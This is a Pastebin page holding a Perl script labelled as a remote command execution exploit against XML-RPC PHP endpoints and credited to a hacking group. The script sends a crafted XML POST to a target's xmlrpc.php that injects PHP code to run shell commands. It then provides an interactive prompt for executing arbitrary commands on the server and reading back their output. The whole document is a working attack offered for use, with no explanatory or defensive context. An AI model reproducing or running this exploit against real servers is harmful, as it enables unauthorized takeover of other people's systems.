Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use IO::Socket;
- print "XMLRPC remote commands execute exploit by TurkHackTeam.Org Kaan (http://www.turkhackteam.org)\n";
- if ($ARGV[0] && $ARGV[1])
- {
- $host = $ARGV[0];
- $xml = $ARGV[1];
- $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n";
- while (1) {
- print '['.$host.']# ';
- $cmd = <STDIN>;
- chop($cmd);
- last if ($cmd eq 'exit');
- {
- $xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_\n';echo `".$cmd."`;echo
- '_end_';exit;/*</name></value></param></params></methodCall>";
- print $sock "POST ".$xml." HTTP/1.1\n";
- print $sock "Host: ".$host."\n";
- print $sock "Content-Type: text/xml\n";
- print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
- $good=0;
- while ($ans = <$sock>)
- {
- last if ($ans =~ /^_end_/);
- if ($good == 1) { print "$ans"; }
- if ($ans =~ /^_begin_/) { $good = 1; }
- }
- if ($good==0) {print "Exploit Failed";exit();}
- }
- }
- }
- else {
- print 'Usage: perl xml.pl target.com /somescript/xmlrpc.php\n';
- exit;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement